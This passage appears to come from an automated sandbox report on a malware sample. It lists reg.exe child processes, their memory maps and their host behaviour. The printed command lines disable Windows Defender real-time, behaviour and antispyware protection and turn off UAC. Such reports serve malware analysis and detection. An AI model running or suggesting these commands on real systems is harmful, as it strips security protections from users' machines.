| msvcrt.dll | 0x7feffa80000 | 0x7feffb1efff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7feffb20000 | 0x7feffb6cfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffb80000 | 0x7feffb80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd3fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
3 | |
| Write | STD_ERROR_HANDLE | size = 52 |
|
1 |
Registry (1)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\reg.exe | base_address = 0xfff70000 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-19 14:11:55 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 114613 |
|
1 |
Process #12: reg.exe
9
0
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\windows\system32\reg.exe |
| Command Line | reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableRealtimeMonitoring /t REG_DWORD /d 00000001 /f |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:01:20, Reason: Child Process |
| Unmonitor | End Time: 00:01:22, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xaa4 |
| Parent PID | 0x9dc (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AA8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x000cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x000d0000 | 0x00136fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00146fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00151fff | Pagefile Backed Memory | rw |
|
|
|
- |
| reg.exe.mui | 0x00160000 | 0x00168fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00170fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x00547fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x006d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006e0000 | 0x006e0000 | 0x01adffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01ae0000 | 0x01daefff | Memory Mapped File | r |
|
|
|
- |
| user32.dll | 0x77640000 | 0x77739fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77740000 | 0x7785efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77860000 | 0x77a08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| reg.exe | 0xfff70000 | 0xfffc5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd900000 | 0x7fefd96afff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdb80000 | 0x7fefdc48fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdd30000 | 0x7fefdd3dfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefdd40000 | 0x7fefdd6dfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7fefdef0000 | 0x7fefdef7fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefed10000 | 0x7fefed76fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefed80000 | 0x7fefee88fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0f0000 | 0x7feff1cafff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feff1d0000 | 0x7feff2fcfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff4e0000 | 0x7feff550fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff850000 | 0x7feff86efff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feffa80000 | 0x7feffb1efff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7feffb20000 | 0x7feffb6cfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffb80000 | 0x7feffb80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
3 | |
| Write | STD_ERROR_HANDLE | size = 52 |
|
1 |
Registry (1)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\reg.exe | base_address = 0xfff70000 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-19 14:11:55 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 114691 |
|
1 |
Process #13: reg.exe
9
0
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\windows\system32\reg.exe |
| Command Line | reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableScanOnRealtimeEnable /t REG_DWORD /d 00000001 /f |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:01:20, Reason: Child Process |
| Unmonitor | End Time: 00:01:22, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xaac |
| Parent PID | 0xa14 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AB0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| reg.exe.mui | 0x000e0000 | 0x000e8fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0041ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000420000 | 0x00420000 | 0x005a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x00730fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x01b3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01b40000 | 0x01e0efff | Memory Mapped File | r |
|
|
|
- |
| user32.dll | 0x77640000 | 0x77739fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77740000 | 0x7785efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77860000 | 0x77a08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| reg.exe | 0xfff70000 | 0xfffc5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd900000 | 0x7fefd96afff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdb80000 | 0x7fefdc48fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdd30000 | 0x7fefdd3dfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefdd40000 | 0x7fefdd6dfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7fefdef0000 | 0x7fefdef7fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefed10000 | 0x7fefed76fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefed80000 | 0x7fefee88fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0f0000 | 0x7feff1cafff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feff1d0000 | 0x7feff2fcfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff4e0000 | 0x7feff550fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff850000 | 0x7feff86efff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feffa80000 | 0x7feffb1efff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7feffb20000 | 0x7feffb6cfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffb80000 | 0x7feffb80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
3 | |
| Write | STD_ERROR_HANDLE | size = 52 |
|
1 |
Registry (1)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\reg.exe | base_address = 0xfff70000 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-19 14:11:55 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 115159 |
|
1 |
Process #14: reg.exe
9
0
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\windows\system32\reg.exe |
| Command Line | reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableBehaviorMonitoring /t REG_DWORD /d 00000001 /f |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:01:20, Reason: Child Process |
| Unmonitor | End Time: 00:01:22, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xab4 |
| Parent PID | 0xa04 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AB8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x001bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| reg.exe.mui | 0x001e0000 | 0x001e8fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x00270fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00280fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0042ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x005b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x005dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x00760fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x01b6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01b70000 | 0x01e3efff | Memory Mapped File | r |
|
|
|
- |
| user32.dll | 0x77640000 | 0x77739fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77740000 | 0x7785efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77860000 | 0x77a08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| reg.exe | 0xfff70000 | 0xfffc5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd900000 | 0x7fefd96afff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdb80000 | 0x7fefdc48fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdd30000 | 0x7fefdd3dfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefdd40000 | 0x7fefdd6dfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7fefdef0000 | 0x7fefdef7fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefed10000 | 0x7fefed76fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefed80000 | 0x7fefee88fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0f0000 | 0x7feff1cafff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feff1d0000 | 0x7feff2fcfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff4e0000 | 0x7feff550fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff850000 | 0x7feff86efff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feffa80000 | 0x7feffb1efff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7feffb20000 | 0x7feffb6cfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffb80000 | 0x7feffb80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd4000 | 0x7fffffd4000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
3 | |
| Write | STD_ERROR_HANDLE | size = 52 |
|
1 |
Registry (1)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\reg.exe | base_address = 0xfff70000 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-19 14:11:56 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 115191 |
|
1 |
Process #15: reg.exe
9
0
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\windows\system32\reg.exe |
| Command Line | reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 00000001 /f |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:01:20, Reason: Child Process |
| Unmonitor | End Time: 00:01:22, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xabc |
| Parent PID | 0x9ec (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AC0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000effff | Private Memory | rw |
|
|
|
- |
| reg.exe.mui | 0x000f0000 | 0x000f8fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00110fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0041ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000420000 | 0x00420000 | 0x005a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x00730fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x01b3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01b40000 | 0x01e0efff | Memory Mapped File | r |
|
|
|
- |
| user32.dll | 0x77640000 | 0x77739fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77740000 | 0x7785efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77860000 | 0x77a08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| reg.exe | 0xfff70000 | 0xfffc5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd900000 | 0x7fefd96afff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdb80000 | 0x7fefdc48fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdd30000 | 0x7fefdd3dfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefdd40000 | 0x7fefdd6dfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7fefdef0000 | 0x7fefdef7fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefed10000 | 0x7fefed76fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefed80000 | 0x7fefee88fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0f0000 | 0x7feff1cafff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feff1d0000 | 0x7feff2fcfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff4e0000 | 0x7feff550fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff850000 | 0x7feff86efff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feffa80000 | 0x7feffb1efff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7feffb20000 | 0x7feffb6cfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffb80000 | 0x7feffb80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
3 | |
| Write | STD_ERROR_HANDLE | size = 52 |
|
1 |
Registry (1)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\reg.exe | base_address = 0xfff70000 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-19 14:11:55 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 114473 |
|
1 |
Process #16: reg.exe
13
0
| Information | Value |
|---|---|
| ID | #16 |
| File Name | c:\windows\system32\reg.exe |
| Command Line | reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm /v EnableLUA /t REG_DWORD /d 0 /f |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:01:20, Reason: Child Process |
| Unmonitor | End Time: 00:01:22, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xac4 |
| Parent PID | 0x9d4 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AC8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
